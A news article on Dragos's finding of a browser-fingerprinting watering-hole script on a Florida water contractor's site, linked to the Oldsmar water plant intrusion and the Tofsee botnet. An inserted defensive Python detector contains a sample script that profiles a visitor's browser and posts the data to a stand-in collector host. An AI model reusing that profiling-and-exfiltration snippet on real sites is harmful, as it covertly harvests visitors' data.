At the beginning of February 2021, an unknown attacker compromised the computer system of a water plant in the Florida town of Oldsmar and attempted to raise the level of sodium hydroxide (NaOH) in the water to a dangerous concentration. The effort was thwarted by the plant operator, who noticed the intrusion and quickly reversed the command, so the impact was minimal. Now it turns out that this was not the only incident involving Oldsmar at the time.
While digging into the water poisoning attempt, security researchers from Dragos discovered that a Florida water utility contractor was hosting malicious code targeting water utilities on its website. That site was visited from a computer on a network belonging to the City of Oldsmar on February 5, the same day as the poisoning event. This was the same network on which an unknown actor reportedly compromised a water treatment plant control computer, Dragos said.
The malicious script in question was designed to collect browser and system data: operating system and CPU, browser type and available languages, touch points and input methods, the presence of a camera, accelerometer and microphone, video card and display adapter details, time zone and geolocation, supported video codecs, screen dimensions, and browser plugins. The gathered data was then sent to a database on the Heroku app site that hosted the script.
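As an added illustration of the collection behaviour described above (this is not code from Dragos or from the article), the following Python triage helper scans a piece of JavaScript for the browser APIs behind those data categories and for off-site endpoints it posts to, so a defender reviewing a suspect page can see at a glance what a script gathers and where it sends it. The API-to-category mapping, the suspicion threshold, the hostnames and the sample script are all constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Browser APIs mapped to the data categories listed in the Dragos finding.
# The mapping is a constructed heuristic, not a complete catalogue.
FINGERPRINT_APIS = {
    "navigator.platform": "os/cpu",
    "navigator.userAgent": "browser",
    "navigator.languages": "languages",
    "navigator.maxTouchPoints": "touch points",
    "enumerateDevices": "camera/microphone",
    "DeviceMotionEvent": "accelerometer",
    "UNMASKED_RENDERER_WEBGL": "video card",
    "getTimezoneOffset": "time zone",
    "timeZone": "time zone",
    "getCurrentPosition": "geolocation",
    "canPlayType": "video codecs",
    "screen.width": "screen dimensions",
    "navigator.plugins": "browser plugins",
}

def analyze_script(js: str, site_host: str):
    """Return (fingerprint categories touched, off-site hosts referenced)."""
    categories = {cat for api, cat in FINGERPRINT_APIS.items() if api in js}
    off_site = set()
    for url in re.findall(r"""["'](https?://[^"'\s]+)["']""", js):
        host = urlparse(url).hostname or ""
        # Anything outside the hosting site's own domain is a potential exfil point.
        if host and host != site_host and not host.endswith("." + site_host):
            off_site.add(host)
    return categories, off_site

def is_suspicious(js: str, site_host: str, min_categories: int = 5) -> bool:
    """Flag scripts that both profile the browser broadly and talk to a third party."""
    categories, off_site = analyze_script(js, site_host)
    return len(categories) >= min_categories and bool(off_site)

# Constructed sample resembling a profiling script; hostnames use reserved TLDs.
SAMPLE_SCRIPT = """
var d = {ua: navigator.userAgent, os: navigator.platform,
         langs: navigator.languages, touch: navigator.maxTouchPoints,
         tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
         scr: [screen.width, screen.height], plugins: navigator.plugins.length};
fetch("https://collector.example/submit", {method: "POST", body: JSON.stringify(d)});
"""

if __name__ == "__main__":
    print(analyze_script(SAMPLE_SCRIPT, "utility-contractor.example"))
    print(is_suspicious(SAMPLE_SCRIPT, "utility-contractor.example"))
```

Run against real page content, the off-site host list is the part worth matching against proxy logs; a script that only reads navigator.userAgent and never leaves the site should not trip the threshold.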
Further investigation led researchers to DarkTeam Store, a dark market that supplies thousands of customers with gift cards and accounts.
“Additional analysis of data obtained by Dragos revealed that at least a portion of this site may not actually be a dark market, but rather a check-in place for systems infected with a recent variant of botnet malware known as Tofsee. Dragos found evidence showing that the DarkTeam store and the water infrastructure construction company website were subverted by the same actor on the same day (20 December 2020),” Dragos said. The research team found 12,735 Tofsee-infected systems worldwide, which connected to the DarkTeam site.
“With the forensic information we collected so far, Dragos’ best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware’s ability to impersonate legitimate web browser activity,” Dragos said.
“We do not understand why the adversary chose this specific Florida water construction company site to compromise and to host their code. Interestingly, and unlike other watering hole attacks, the code did not deliver exploits or attempt to achieve access to victim computers. It is possible the actor believed that the water infrastructure construction website would allow more dwell time to collect data important for the actor’s objectives than perhaps a busier but more closely monitored website with a dedicated security team.”